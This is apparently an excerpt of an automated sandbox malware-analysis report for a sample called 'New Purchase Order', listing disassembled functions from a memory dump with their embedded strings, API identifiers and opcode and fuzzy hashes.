                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Cleanup Group$Threadpool!
                                                          • API String ID: 2994545307-4008356553
                                                          • Opcode ID: 00e4719cec83ade5385f581e810b903e444ad64f3759bfa5b25f98278eeabe02
                                                          • Instruction ID: 951b85cef8f9c04b8779fa3a0e01225f42342d5c43aa7f58a367e98ad117fe03
                                                          • Opcode Fuzzy Hash: 00e4719cec83ade5385f581e810b903e444ad64f3759bfa5b25f98278eeabe02
                                                          • Instruction Fuzzy Hash: 4401D1B2244704AFD311DF14CD45B1A77E8E785B19F048939A648C7190E334DA04DB46
                                                          Function 0184C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MUI
                                                          • API String ID: 0-1339004836
                                                          • Opcode ID: 45ce78b2bafcec0ec4ad45d569a73bfbfcdb3e528f5d9bd2d1e98247a628f843
                                                          • Instruction ID: eb2db26338ec1c920e179240a1be41ab5426ca08f2003d4022cf706484de1b16
                                                          • Opcode Fuzzy Hash: 45ce78b2bafcec0ec4ad45d569a73bfbfcdb3e528f5d9bd2d1e98247a628f843
                                                          • Instruction Fuzzy Hash: CC828B75E0121C8FEB24CFA9C880BEDBBB5BF58314F14816AD959EB351EB709A41CB50
                                                          Function 018C6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: d0ee4beabf11f79d3a164bcab93870e7d59270f8cd648a98db7b4b50b310c168
                                                          • Instruction ID: 7e697ca9d812f7ee8efd5868a290ccc503b4ddfa48e05b9a085fffe11ce6192a
                                                          • Opcode Fuzzy Hash: d0ee4beabf11f79d3a164bcab93870e7d59270f8cd648a98db7b4b50b310c168
                                                          • Instruction Fuzzy Hash: 19916271900219AFDB21DB99CD85FAEBBB8EF14B50F204069F605EB291E774EE04CB51
                                                          Function 018EE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: ed97d2e3b7017cdb665082e8fcaedf5d3e1317183315f76878957e5c7392850c
                                                          • Instruction ID: 016ef1034badd6a929fdfe4d159b9b4c3bb563707f349c308fe1f87514a72a47
                                                          • Opcode Fuzzy Hash: ed97d2e3b7017cdb665082e8fcaedf5d3e1317183315f76878957e5c7392850c
                                                          • Instruction Fuzzy Hash: 2891803290064ABFDB22AFA9DC48FAFBBB9EF46744F140015F905E7251E7749A01CB51
                                                          Function 0187A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalTags
                                                          • API String ID: 0-1106856819
                                                          • Opcode ID: d21248043ff0d29372cbf7ee1c9777d7340cc9dc8b1776a7268f734e8d30f593
                                                          • Instruction ID: 3a3d1582eaaef2016457dbe6543d477f00a414b0cad09a6ed89c2b65a5f013ee
                                                          • Opcode Fuzzy Hash: d21248043ff0d29372cbf7ee1c9777d7340cc9dc8b1776a7268f734e8d30f593
                                                          • Instruction Fuzzy Hash: 777139B5E0021A9BDF28CF9CD590AEDBBB2BF58714F24812AE905E7341E7319A41CB54
                                                          Function 018E4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .mui
                                                          • API String ID: 0-1199573805
                                                          • Opcode ID: 8e0d570f8326c7ecd4a09b67834c8211f0bf9acaf2a977ed150b7d4eb9db6d67
                                                          • Instruction ID: e4c5cd4aeace5ccb624af2a75acc112019d1b3a2da79624d5cfbf9b5bc1b177b
                                                          • Opcode Fuzzy Hash: 8e0d570f8326c7ecd4a09b67834c8211f0bf9acaf2a977ed150b7d4eb9db6d67
                                                          • Instruction Fuzzy Hash: FD519372D002299BDF10DF9DD848AAEBBF5AF46714F05412DEA15FB310D7349A01CBA4
                                                          Function 0185E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: EXT-
                                                          • API String ID: 0-1948896318
                                                          • Opcode ID: e04c4a9f33f79df51cf58127304fec89edd45dd2b54edb2875498d886fa5ecc9
                                                          • Instruction ID: 4c8353339feae2910541a0e9d9d341c150eea021b3020dcf7d360e301ec2be0d
                                                          • Opcode Fuzzy Hash: e04c4a9f33f79df51cf58127304fec89edd45dd2b54edb2875498d886fa5ecc9
                                                          • Instruction Fuzzy Hash: B4415C725083069BD761DA79CC80B6BFBE8EF88718F44092DBA84D7140E674DB0887A7
                                                          Function 018BC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryHash
                                                          • API String ID: 0-2202222882
                                                          • Opcode ID: 99f16dfac51e63f2a176386d4affd4d0fd883fa653039b3bbbda78175fe0aff6
                                                          • Instruction ID: 272325afaf5a291d8af3e0d88e6c046629e00a4372f2d1f6bafc8b2e37d10c0f
                                                          • Opcode Fuzzy Hash: 99f16dfac51e63f2a176386d4affd4d0fd883fa653039b3bbbda78175fe0aff6
                                                          • Instruction Fuzzy Hash: DE4141B2D0112DABDB21DA54CC84FDEB77CAB45714F0045A5EA08EB241DB709F898FA5
                                                          Function 018D6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: 224253fe89a8fb57646308c30ec170626c2ee97992906746a71d8b7d95426a81
                                                          • Instruction ID: 5f6f3cf8b7b879b350b5ad46464ddad2a1b5fb2974b767cea5a4be26054bc783
                                                          • Opcode Fuzzy Hash: 224253fe89a8fb57646308c30ec170626c2ee97992906746a71d8b7d95426a81
                                                          • Instruction Fuzzy Hash: 4C310931A0075D9BEB22DF6DC850BEE7BB8EF15704F244028E941EB282E775EA05CB50
                                                          Function 018C892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 018C895E
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                          • API String ID: 0-702105204
                                                          • Opcode ID: 78068f0de39eb16c0cff0c2b947cc73a77522a6e682d691378b4c2194e33d627
                                                          • Instruction ID: aa02e180a6ae1d1213b6493780612f484e399f15341e3f9ae4950b6003b1033f
                                                          • Opcode Fuzzy Hash: 78068f0de39eb16c0cff0c2b947cc73a77522a6e682d691378b4c2194e33d627
                                                          • Instruction Fuzzy Hash: 540142322402059BE620AB598884ADA7B60EFC6B54B05002CF64682521CF30EE88C7A3
                                                          Function 018E2000 Relevance: .8, Instructions: 757COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78769d0f09df127f8cd4e647c7daf05b65d0f5fdf449becde6e7b339d2cad636
                                                          • Instruction ID: 6962db396effa33f15c87dd3670426e8ae9be3d0a175a603cc73d425536eee7c
                                                          • Opcode Fuzzy Hash: 78769d0f09df127f8cd4e647c7daf05b65d0f5fdf449becde6e7b339d2cad636
                                                          • Instruction Fuzzy Hash: 5E42C5716083419BD725CF68C894A6FBBEABF8A704F08092DFA86D7250D770DA45CB52
                                                          Function 018D8158 Relevance: .6, Instructions: 617COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ff40308d0e7865c2064f7e5f2363aca2e619a332df1d9565177b905cd35806a5
                                                          • Instruction ID: 47a427d18ee85715e867b925e5a00ad3490694cfc1a65f7e1cafee5159c4c29e
                                                          • Opcode Fuzzy Hash: ff40308d0e7865c2064f7e5f2363aca2e619a332df1d9565177b905cd35806a5
                                                          • Instruction Fuzzy Hash: 97425C75A003198FEB25CF69C881BADBBF5BF49310F158099E94DEB242DB349A85CF50
                                                          Function 01852840 Relevance: .6, Instructions: 605COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c909f416a2806f75e5e63e9bc24463270b2283d15d9d25c04c230c728587fb19
                                                          • Instruction ID: fe858f70153d55909796f06ec7a0621916d7ae4bb895d5cbf225512dba3f417f
                                                          • Opcode Fuzzy Hash: c909f416a2806f75e5e63e9bc24463270b2283d15d9d25c04c230c728587fb19
                                                          • Instruction Fuzzy Hash: 9532CF70A00759CBEB25CF69C8447BEBBF2BF84704F68411DD586DB289EB35AA01CB50
                                                          Function 018EA118 Relevance: .6, Instructions: 591COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e97aec7584de5f0608bd7311be0ec84e793f5a681808ebcc842ed941b77f4401
                                                          • Instruction ID: 50a1ebbeba20b219635152c056d1e96ec4679eacd527c89c2c6189e6f71cba2d
                                                          • Opcode Fuzzy Hash: e97aec7584de5f0608bd7311be0ec84e793f5a681808ebcc842ed941b77f4401
                                                          • Instruction Fuzzy Hash: 7E22D2742046658BEB2DCF2DC498372BBF1AF47B08F088459E996CF286D335D652CB60
                                                          Function 01846A50 Relevance: .5, Instructions: 548COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72d9920d51ea32342b8df6d7b0349c56e98ce76946e2bef54b962b287298d6b7
                                                          • Instruction ID: 2307cb6437e9069acfb0f120403e59ee96db5b09901f87bd1696464087e3ab8a
                                                          • Opcode Fuzzy Hash: 72d9920d51ea32342b8df6d7b0349c56e98ce76946e2bef54b962b287298d6b7
                                                          • Instruction Fuzzy Hash: C332B071A01609CFEB25CF68C480BAABBF2FF49304F244569E955EB351EB34EA41CB50
                                                          Function 01864A35 Relevance: .4, Instructions: 423COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                          • Instruction ID: 91b904dd758aef64ef343c5219b2a83a5f0cab0ecb35d83def817d302ad919f1
                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                          • Instruction Fuzzy Hash: 87F17071E0021A9BEF15CF99D580BAEBBF9BF48714F088129E905EB345E774DA41CB60
                                                          Function 018D892B Relevance: .4, Instructions: 386COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f64c9ccf4dd846f5444113be3c68b906bcb94e6beac7c57516818f54b2da3143
                                                          • Instruction ID: 2d8e9b91e4eba380d3443c74413943484cf31717aafbeee15eccae7a4fb08f46
                                                          • Opcode Fuzzy Hash: f64c9ccf4dd846f5444113be3c68b906bcb94e6beac7c57516818f54b2da3143
                                                          • Instruction Fuzzy Hash: 03D1FF71A0070A9BDF05CF69C841BBEBBF1AF8A304F198169D955E7281E735EA058B60
                                                          Function 018465D0 Relevance: .4, Instructions: 383COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5aa6d77c078596e51fa7e855796627dc933f0b6b5e381e0c11f211b1b5bcd47e
                                                          • Instruction ID: f6bc6d790e9250e530e6cfc6e122a30203ec69cd809ce84747f4bd21c04daa4a
                                                          • Opcode Fuzzy Hash: 5aa6d77c078596e51fa7e855796627dc933f0b6b5e381e0c11f211b1b5bcd47e
                                                          • Instruction Fuzzy Hash: F9E19E75508346CFC715CF28C090A6ABBE1FF8A318F148A6DE995C7351EB31EA05CB92
                                                          Function 01838397 Relevance: .4, Instructions: 380COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e3ddb224e2c35c6a95eb7156857d90c74fc2cbf6d79234613283277ada807907
                                                          • Instruction ID: 2c04dcac97730c8174c92814018ba8e947e1cfa0b3ebfe81964f8259b97217bd
                                                          • Opcode Fuzzy Hash: e3ddb224e2c35c6a95eb7156857d90c74fc2cbf6d79234613283277ada807907
                                                          • Instruction Fuzzy Hash: 82D1D371A0020A9BDF15DF68D880EBA77A5BF95308F08462DF916DB281E734EB54CBD1
                                                          Function 018C8243 Relevance: .3, Instructions: 322COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction ID: 817d06c0f5e2cc9c144ae5f53fe3a6080122157aecde3e68f8ca5afc44f20289
                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction Fuzzy Hash: 90B1A474A40609AFDF24DF98C944EABBBBAFF85704F10445EAA42D7790DA74EA05CB10
                                                          Function 01850535 Relevance: .3, Instructions: 300COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction ID: e9b9570e0ebecd7f496210eea52f99fcd933c3d889845dbb88a14e4fb306cb30
                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction Fuzzy Hash: 09B1F73160064A9FEB15DBA8C850BBEBBF6EF44304F184569EA52E7281D770DF41CB91
                                                          Function 018483C0 Relevance: .3, Instructions: 281COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a0dc2c42558b1d5de09085ada7521510d27ce17a80aa61032dd777bc5566f1b6
                                                          • Instruction ID: ff7c8857e1f17d79a54da04f31144140224f33e744352534394fd52f181068bb
                                                          • Opcode Fuzzy Hash: a0dc2c42558b1d5de09085ada7521510d27ce17a80aa61032dd777bc5566f1b6
                                                          • Instruction Fuzzy Hash: 6EC159746083458FE764CF59C484BABB7E5BF88304F44495DE989C7291DB74EA04CF92
                                                          Function 0183C427 Relevance: .3, Instructions: 280COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abc9034231dd33ff0a222a0a26003977b34bdb1cf2b1afaf0668074afe68892a
                                                          • Instruction ID: 03e4975d2a0796329fdc1f55ec96f1e6e02f8f1c05f4047291baee27c5625139
                                                          • Opcode Fuzzy Hash: abc9034231dd33ff0a222a0a26003977b34bdb1cf2b1afaf0668074afe68892a
                                                          • Instruction Fuzzy Hash: 0CB17670A002658BDB25DF58C890BA9B3B5FF84704F0485EAE50AE7281EB70DE85CB61
                                                          Function 0186E5E7 Relevance: .3, Instructions: 278COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f7c6ecf50b67fa845299e2bff090e1e7b88aa38ce08e0c25c8c7c8414de56973
                                                          • Instruction ID: afebc37edd73cb2d97fce2eda671624e8ab79bdcc94fc0056f17531ba9e7d0b9
                                                          • Opcode Fuzzy Hash: f7c6ecf50b67fa845299e2bff090e1e7b88aa38ce08e0c25c8c7c8414de56973
                                                          • Instruction Fuzzy Hash: A3A1F535E006299FEB21DB9CC848BAEBBB9AF04754F050125EB11EB291D7789F41CB91
                                                          Function 01880185 Relevance: .3, Instructions: 276COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cc8cbc84c3236fd5ac20e2d8f435369e3be58fd05ca71924008d912bed082165
                                                          • Instruction ID: 262cbd3deea5bd3ebc2f8b0cdcbcd1dc9e08ba71741db6813dd2a57a454c0e29
                                                          • Opcode Fuzzy Hash: cc8cbc84c3236fd5ac20e2d8f435369e3be58fd05ca71924008d912bed082165
                                                          • Instruction Fuzzy Hash: A7A1B171B0061A9BDB25EF6DC8D0BAAB7B5FF54318F004029EA05D7281EB34EA09C750
                                                          Function 01914500 Relevance: .3, Instructions: 275COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5573869591dc8a5817155f1f18768daa3d777cdb681561c1de2d01f587e8d26a
                                                          • Instruction ID: 00cc504115e992033558c5b910bffa6aba1e497cd94944c3039595980797922e
                                                          • Opcode Fuzzy Hash: 5573869591dc8a5817155f1f18768daa3d777cdb681561c1de2d01f587e8d26a
                                                          • Instruction Fuzzy Hash: 23A1CE72A04216EFC712DF18C980B1ABBE9FF48748F050968E949DB655C734EE81CB92
                                                          Function 01912B57 Relevance: .3, Instructions: 266COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                          • Instruction ID: 890159cfeb8928ca6bd9f2e856e0fdd09d06ef89617e4457d623930eb400cd53
                                                          • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                          • Instruction Fuzzy Hash: 63B14C75E0061ADFDF15DFADC880AADBBB5FF48310F248169E919AB354D730A981CB90
                                                          Function 018C60E0 Relevance: .3, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e17946f4171496e478d10aaaa7b36626b98ed1275a3ef0c02792547a9d27693b
                                                          • Instruction ID: b5b0e1da32350ee5854712995f768950efb9731f5da126d798d876de040f607c
                                                          • Opcode Fuzzy Hash: e17946f4171496e478d10aaaa7b36626b98ed1275a3ef0c02792547a9d27693b
                                                          • Instruction Fuzzy Hash: 22915471D00216AFDB15CFA8D894BAEBBB5EF48B10F25416DE614EB351E734DB009BA0
                                                          Function 0185E3F0 Relevance: .3, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 364dbac442b2a93c005de6658f4ed71701c7cffb771081ebf58936df8a83ed10
                                                          • Instruction ID: 2d843ad6737180f84ce53782c7699ef8738dd088c95c76e9485f01f1f476c50f
                                                          • Opcode Fuzzy Hash: 364dbac442b2a93c005de6658f4ed71701c7cffb771081ebf58936df8a83ed10
                                                          • Instruction Fuzzy Hash: B1911532E00616DBEB64DB6CC880B7ABBA2EF94758F054069FD05DB281EA34DB01C761
                                                          Function 01896ACC Relevance: .2, Instructions: 226COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35a19abeadbff16cf5ab98f3a64d0c5e19fe59fcfe64c08c9ea78df0256314f1
                                                          • Instruction ID: 272e22f46f2b5667291739280eae9d9e6f130d83f4517704705ba581ae1d359e
                                                          • Opcode Fuzzy Hash: 35a19abeadbff16cf5ab98f3a64d0c5e19fe59fcfe64c08c9ea78df0256314f1
                                                          • Instruction Fuzzy Hash: 878182B1E0061A9BDB14CF69C940ABEBBF9FB48704F18852EE455E7640F734DA41CB94
                                                          Function 0190AB40 Relevance: .2, Instructions: 222COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                          • Instruction ID: 752458529e37636b1b4edd01e84958de4fcc0e9c6e43229b5dfcc111f3190e9c
                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                          • Instruction Fuzzy Hash: 5B819431A107169FDF1ACF59C490AAEBBF6FF84310F198569D91A9B384D734EA01CB80
                                                          Function 0187E284 Relevance: .2, Instructions: 212COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c0f97906a211d89b0b610f7e0a0e4e28465e27d07f80340e26da25efac28b34e
                                                          • Instruction ID: 65aa03e5cb51617115ef7414dd179c860d77b9e0511c5625816477da4f5044e7
